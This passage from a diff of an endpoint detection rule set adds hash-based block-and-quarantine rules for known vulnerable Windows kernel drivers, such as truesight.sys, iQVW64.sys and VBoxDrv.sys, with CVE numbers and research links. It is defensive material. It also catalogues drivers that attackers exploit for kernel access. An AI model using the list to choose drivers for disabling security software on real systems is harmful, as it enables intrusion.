"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972371Z", + "creation_date": "2026-03-23T11:45:29.972373Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972378Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "727666434d5ea292a7631d0944edd36097db12862730996ce8a3f052be04a2cd", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a87e18e6-2986-5f6f-85bc-438b74234674", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982271Z", + "creation_date": "2026-03-23T11:45:29.982273Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982279Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4cff6e53430b81ecc4fae453e59a0353bcfe73dd5780abfc35f299c16a97998e", + "comment": "Vulnerable Kernel 
Driver (aka t3.sys) [https://www.loldrivers.io/drivers/31a962ce-43ef-410f-873a-7ccc8f00332b/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a8842d7a-3156-5926-a1e0-bf806cdebf15", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145729Z", + "creation_date": "2026-03-23T11:45:31.145731Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145737Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dc5205f4653d4f1f26dd23d00f83746c5e5fae208a55851add88ee2ef4352f9d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a89cdefa-b7b4-5273-92fe-0e00c746b8bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493006Z", + 
"creation_date": "2026-03-23T11:45:31.493009Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493018Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "421383a2fe20328af88ab454b863484805640dd5902e6c5f07e6bf3f9cbb9f5a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a8bc7cb5-4a83-5e4c-a37c-cd93c0d097fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472496Z", + "creation_date": "2026-03-23T11:45:31.472499Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472508Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7939d3cac950f51ebcf360eb14283705da2083114170d1a179deb7b13a3afc9b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a8c63869-3265-5ff3-85be-b738e4b5b2ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975895Z", + "creation_date": "2026-03-23T11:45:29.975897Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975903Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f", + "comment": "Gigabyte vulnerable driver (aka GVCIDrv64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a8d6e31c-2f47-5fdb-a6a2-279d836ebb0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822055Z", + "creation_date": "2026-03-23T11:45:31.822057Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822062Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "82332e1e23c95106444745ac4975655c2fb43dd2581cb5a0a7c403d242620aae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a8f40473-7bca-5b34-959a-959ce87f18c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819001Z", + "creation_date": "2026-03-23T11:45:30.819003Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819008Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b63080bead00cae92efb917b7a707c6a2d6628a1e90301795617b45273f45e4", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a8f8e945-9959-55b2-809d-a5336b7acd2c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155540Z", + "creation_date": "2026-03-23T11:45:31.155542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4255097a76fd5653a0812c19698bc5d6807c9bf82447372d50bda5aa337b87d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a8f955ec-7fd2-5ccf-b844-cfa509e9f632", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811309Z", + "creation_date": "2026-03-23T11:45:31.811312Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811317Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "882c8e61c7f61166fedde3dfa41c5231493eb2c7d3f3a068d45c77099841705f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a91c0766-1f22-5a44-955f-63c360b0c1f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477987Z", + "creation_date": "2026-03-23T11:45:30.477990Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477999Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7614d88ed04e2d3bf0798380e04b90e04d87a785fbd99f994206da8d9658fe5", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a91e53bc-0e7d-534c-841d-b14898b9a87c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147535Z", + "creation_date": "2026-03-23T11:45:31.147537Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147543Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "33c33ebb9a0fe4b3a808564f581e4151185e9240b46193b71bf0ad9636820b6b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a921cd92-6242-57bf-a88d-fbe618aa4fd9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480654Z", + "creation_date": "2026-03-23T11:45:31.480658Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480668Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "903cf9cdd5b50d6ddc1c781daab91f3b7f22bf373ce80dd4d2e7fb75c6421135", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a92544e1-5238-5a87-9328-bde059a00338", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488811Z", + "creation_date": "2026-03-23T11:45:31.488813Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488818Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "22d60ad34fc8e926e334e4be48c63926a0ccd5e2ae63df76cc4d66bc09040b3b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a92fa5ad-4152-5bd1-8acc-827488fb2211", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608865Z", + "creation_date": "2026-03-23T11:45:29.608867Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608882Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ab14c5c89759695dbb4b310b7cad68d9ec2007277e3b4f3abb883bd05ef557c", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9358759-9878-5228-921a-c66f1c84e1dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146636Z", + "creation_date": "2026-03-23T11:45:31.146639Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146644Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b718a3c789cba79f67320edb91dc04d297ffeabdf81fc462ba8507254003c69c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a93e66d5-2d06-5084-a4af-1bb092d2ee3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618984Z", + "creation_date": "2026-03-23T11:45:29.618985Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618991Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e52bb23d6e4572fda5318addb4dad602629c8f254b8e6c4baf4033dddf13d660", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a93f2d22-5176-5690-ba76-d273e43544c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.832370Z", + "creation_date": "2026-03-23T11:45:30.832372Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832377Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cfaf896771945c790bed21d17cb91891263412a96d191d020ce12e1a85319c9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a94304b5-724c-57e0-b43c-2b02753f4e6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482315Z", + "creation_date": "2026-03-23T11:45:31.482342Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482351Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c63f144892f434182835baceaa8f24a13710b68b0bfee977a7faa9510f9a322f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9479d8c-5923-5430-ac76-03540b10726f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147331Z", + "creation_date": "2026-03-23T11:45:31.147333Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71a0e584e9bc1e4c2bc4ac4b158b9a376938ff83d8083f957435ee115ca5cb02", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a94ab1ce-622f-5329-8f98-ef7f970daad1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814915Z", + "creation_date": "2026-03-23T11:45:31.814918Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814927Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b304dc8d6a996218f4ccdb6e554aa2af7b0aadf5c1313e3c5dc0b621b7adf43a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a94ceae0-6a78-58cd-afa6-e163bec8a068", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808020Z", + "creation_date": "2026-03-23T11:45:31.808023Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808032Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b4ca02a619b738037fff6a64cc299ca7568ac3af82d97b599e08f89988f4f2ca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9513968-7fb2-5cad-824d-bdf1ff9195c4", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144964Z", + "creation_date": "2026-03-23T11:45:31.144966Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144971Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d71593b9dfebaf98bed630fd89f57ee5649bc1e1cb339e6b6ed4187163adead2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a9598a09-2caf-5f1b-b1ac-7ef16c3aef5e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489899Z", + "creation_date": "2026-03-23T11:45:31.489903Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.489912Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48b13939682024b6545c0aaefc90e572165a3d2cc595aa91a3f4d113182e4c86", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a961da03-0fae-564c-88e4-279e1735934f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145000Z", + "creation_date": "2026-03-23T11:45:31.145002Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145008Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": 